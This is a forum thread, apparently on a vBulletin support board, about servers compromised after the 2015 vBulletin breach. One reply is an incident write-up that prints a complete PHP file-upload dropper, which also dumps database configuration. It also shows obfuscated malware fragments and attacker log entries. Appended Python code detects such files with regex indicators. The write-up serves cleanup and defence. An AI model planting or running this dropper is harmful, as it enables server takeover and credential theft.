My web host has detected a virus on the server. The file that they say is a virus "core/vbpatch_v10835.php". Does anyone know if this is a legit file?
Virus Detected on web host.
Assuming you're operating on vBulletin 5.1.9 Patch Level 1, I have no such file in my vBulletin installation.
Because vBulletin.com itself was hacked and its database compromised (see online news links at the end of this article or VB's password reset announcement), there was a complete list of all vBulletin website URLs that the hackers would have been able to access. This caused a lot of sites to be owned very fast. I installed the patch just 24 hours after the security announcement and our forum (a small motorcycle club, hardly a high profile target) was already hacked. If you didn't install the patch within 24 hours, your vBulletin is probably owned too.
These hackers were sophisticated: using a large Russian botnet with hundreds of IP addresses, they proceeded to drop malware files all over the codebase, including fake .php files in vBulletin as well as in WordPress and other PHP applications on the server. In my case it all started with this file, which they dropped on the server Nov 6th 6:39PM Pacific time, about 24 hours from the security bulletin's release and just hours before I installed the patch.
402 Nov 6 18:39 jsrender.php - in forum/core
/public_html_hacked/forum/core# more jsrender.php
<?php
if ((!isset($_REQUEST['pwd'])) || (empty($_REQUEST['pwd'])) || (md5($_REQUEST['pwd'])!='1a52094472487da553df7b35be694127')) die('NULL');
if (isset($_FILES['js']))
if (move_uploaded_file($_FILES['js']['tmp_name'],$_FILES['js']['name']))
echo $_FILES['js']['name'];
if (isset($_REQUEST['config']))
{
include('includes/config.php');
echo "\n\n<config>".json_encode($config)."</config>\n\n";
}
?>
This is a simple file dropper script that was then used to install and hide more malware and eventually start a spam campaign. Here they are using it (they only needed to once):
188.163.80.234 - - [08/Nov/2015:11:12:49 -0800] "POST /forum/core/jsrender.php HTTP/1.0" 200 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
From there they created the following malware files (your malware files may vary in your installation; it doesn't matter, as the whole codebase is throwaway, there's no way to accurately find all the malware and clean it, these guys know what they are doing). You will note they sneakily changed the dates on the .PHP files to Oct 24th, so it's impossible to just check by date to see which ones have changed. (Oct 24th is the date when I last updated the vBulletin codebase, so the files hide amongst the other ones in the folder and don't show up as changed.)
4768 Nov 8 11:12 vbpatch_v74862.php - in /forum/core
This is not a legit VB script, and looking at it confirms it's all obfuscated malware:
public_html_hacked/forum/core# cat vbpatch_v74862.php
<?php ${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x64\x71\x79\x65e"]="\x76\x61lue";${"\x47\x4c\x4f\x42\x41L\x53"}["\x77\x62\x71q\x62\x67\x6f"]="\x6b\x65\x79";${"\x47LOB\x41\x4c\x53"}["t\x66\x62\x71\x75\x76\x75"]="\x64\x61\x74a";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x62ba\x6e\x68\x71\x76\x6e\x64k"]="i";${"\x47\x4c\x4fB\x41\x4c\x53"}["e\x77\x76\x74uj\x71f\x73c\x70"]="\x64at\x61";${"\x47LO\x42\x41L\x53"}["\x6fhnb\x68dky\x76"]="\x6f\x75t_d\x61\x74\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x73rir\x78u"]="d\x61\x74\x61\x5fke\x79";${"\x47L\x4f\x42\x41L\x53"}["x\x65\x77\x68\x72\x72\x68"]="\x64\x61\x74\x61"; [ ... etc ... ]
10938 Oct 24 15:15 error.php - stashed in our wordpress install at /wp-content/themes/Divi/css/error.php, this was used to send out porn spam
Oct 24 10:35 export.php - in /forum/core/vb/external/
223.252.30.129 - - [11/Nov/2015:17:27:52 -0800] "POST /forum/core/vb/external/export.php HTTP/1.0" 200 176 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
This one was the main spam gateway they used. It's sneaky in that they added code to the top of a real vBulletin file (there is an export.php at that location). The malware code is strange looking and easy to spot:
public_html_hacked/forum/core/vb/external# more export.php
<?php
$GLOBALS['gc45'];global$gc45;$gc45=$GLOBALS;$gc45['yc1b']="\x62\x72\x5e\x47\x6c\x5d\x6a\x30\
x46\x68\x57\x3f\x54\x64\x63\x5f\x33\x41\x5a\x22\x61\x78\x40\x23\x79\x2b\x49\x20\x2f\x3a\x6 b\x53\x9\x74\x3b\x38\x4b\x4a\x25
\x6d\x75\x4f\x59\x60\xa\x69\x3d\x45\x36\xd\x2a\x5b\x70\x37\x43\x77\x55\x56\x5c\x39\x7e\x2e \x7d\x2c\x73\x27\x7a\x32\x3c\x34
\x35\x24\x4c\x71\x6f\x44\x21\x48\x58\x31\x7c\x50\x51\x2d\x66\x65\x52\x26\x29\x67\x7b\x6e\x 76\x28\x4d\x3e\x42\x4e";$gc45[$g
c45['yc1b'][20].$gc45['yc1b'][70].$gc45['yc1b'][53].$gc45['yc1b'][16].$gc45['yc1b'][59].$gc45['yc1b'][14].$gc45['yc1b'][20
].$gc45['yc1b'][70].$gc45['yc1b'][53]]=$gc45['yc1b'][14].$gc45['yc1b'][9].$gc45['yc1b'][1];$gc45[$gc45['yc1b'][14].$gc45['
yc1b'][69].$gc45['yc1b'][69].$gc45['yc1b'][53]]=$gc45['yc1b'][74].$gc45['yc1b'][1].$gc45['yc1b'][13];$gc45[$gc45['yc1b'][2
0].$gc45['yc1b'][67].$gc45['yc1b'][79].$gc45['yc1b'][69].$gc45['yc1b'][48].$gc45['yc1b'][13]]=$gc45['yc1b'][64].$gc45['yc1
b'][33].$gc45['yc1b'][1].$gc45['yc1b'][4].$gc45['yc1b'][85].$gc45['yc1b'][91];$gc45[$gc45['yc1b'][66].$gc45['yc1b'][14].$g
c45['yc1b'][13].$gc45['yc1b'][79].$gc45['yc1b'][53].$gc45['yc1b'][85]]=$gc45['yc1b'][45].$gc45['yc1b'][91].$gc45['yc1b'][4
[.. further down the file the regular vBulletin PHP source can be found.]
In the end, I had to perform a full rebuild: I moved all the web files out of the way and rebuilt a cleanly downloaded PHP codebase for vBulletin (don't forget to patch it!!!) and also for my WordPress install. There IS no way you can reliably tell which files have changed, as I mentioned above; these hackers exploiting this in bulk are sophisticated professional criminals and they use very cunning methods to hide their tracks. The only realistic method for recovery is to start fresh with either a backup from before this all happened (i.e. pre-Nov 8th) or by re-downloading all the vBulletin files again. Do not, under any circumstances, just assume you spotted all the malware and removed it; that will not be enough to keep them out.
In my case, the spammers tried to send out 80,000 graphic porn spams before I noticed and was able to shut them down. It was one of the more difficult cleanups I've performed, and I do this stuff for a living.
While I appreciate the rationale behind vBulletin's policy of keeping the info in the locked customer thread, I think it's important they recognize the unusual circumstances here, namely that the initial compromise of the vB site has provided Russian spammers with a laundry list of sites to attack, which they then did attack within the first 24 hours. More information on detecting hacked activity, and specific information on the attack vectors used this last weekend, would be helpful. Requiring customers to be paid up with the latest version to get this information is at best not providing any more security, and at worst gives the (mistaken) impression that VB is taking advantage of this situation as a cash grab, extorting compromised customers into purchasing the latest license in order to upgrade or get information. Insult to injury: there is really no current information to be had on the members-only thread, other than mentioning the need to update and referencing 2 year old instructions on how to recover from hacks.
I urge VB to appreciate the scope of this problem and the unique situation here, and then make more information publicly available, since a great number of people are likely in this situation now. The cat is, after all, already out of the bag as a Google News search for "vbulletin hack" shows. https://news.google.com/news/story?n...ved=0CCEQqgIwA
Last edited by jon mutiger; Thu 12 Nov '15, 10:08am.
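A defender-side check that follows from the post above, written here as an added example (it is not code from the poster or from vBulletin): it flags PHP files that look like the quoted dropper or the hex-escaped blobs, and it compares an install against a freshly downloaded copy by content hash, since the backdated mtimes cannot be trusted. The sample sources, the md5 value and the file names are constructed for the demonstration.

```python
import hashlib
import re
from pathlib import Path

# Constructed samples modelled on the two droppers quoted in the thread (not copies of them).
DROPPER_SAMPLE = r"""<?php
if (md5($_REQUEST['pwd'])!='0123456789abcdef0123456789abcdef') die('NULL');  # placeholder hash
if (isset($_FILES['js'])) move_uploaded_file($_FILES['js']['tmp_name'],$_FILES['js']['name']);"""
OBFUSCATED_SAMPLE = (r'<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x64\x71"]="\x76\x61\x6c";' * 3
                     + r"$g[$g['k'][20].$g['k'][70]]=1;")
CLEAN_SAMPLE = "<?php\nfunction export($x) { return json_encode($x); }"

HEX_ESCAPE = re.compile(r'\\x[0-9a-fA-F]{1,2}')
INDICATORS = {
    "upload dropper": re.compile(r'move_uploaded_file\s*\(\s*\$_FILES', re.I),
    "md5 password gate": re.compile(r'md5\s*\(\s*\$_(?:REQUEST|POST|GET)\[', re.I),
    "hex-escaped GLOBALS access": re.compile(r'\$\{\s*"[^"]*\\x[^"]*"\s*\}\s*\['),
    "index-assembled names": re.compile(r"\$\w+\[\$\w+\['\w+'\]\[\d+\]"),
}

def scan_php_source(src: str) -> list[str]:
    """Names of the indicators that fire on one PHP source text (empty list = nothing suspicious)."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    # Obfuscators spell every name as \xNN escapes; real vBulletin/WordPress code rarely has many.
    if len(HEX_ESCAPE.findall(src)) >= 20:
        hits.append("dense hex escapes")
    return hits

def manifest(root: Path) -> dict[str, str]:
    """Relative path -> sha256 for every file under root; mtimes are ignored on purpose."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_manifests(install: dict[str, str], clean: dict[str, str]) -> dict[str, list[str]]:
    """Files present only in the install, or whose content differs from the clean download."""
    added = sorted(p for p in install if p not in clean)
    modified = sorted(p for p in install if p in clean and install[p] != clean[p])
    return {"added": added, "modified": modified}

if __name__ == "__main__":
    for name, src in [("jsrender", DROPPER_SAMPLE), ("vbpatch", OBFUSCATED_SAMPLE), ("clean", CLEAN_SAMPLE)]:
        print(name, scan_php_source(src))
```

To use it on a real host, build `manifest()` over the live install and over a clean copy of the same version, then run `scan_php_source()` on every file reported as added or modified.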
Thank you very much for the info, @jon mutiger. This happened on Nov 8th, that is 4 days ago. If I do a backup 'til then, then I lose 4 days worth of posts. My host stopped the file from doing anything as soon as it was uploaded. Do you think it is safe to say that I am good, or should I really do a clean install of the vb software and use the backup file of the database?
Jon doesn't know that your problem and his problem are the same problem. He's just guessing. He may be correct but what you need to do first is to check your database for suspect files.
AdminCP / Maintenance / Diagnostics / Suspect File Versions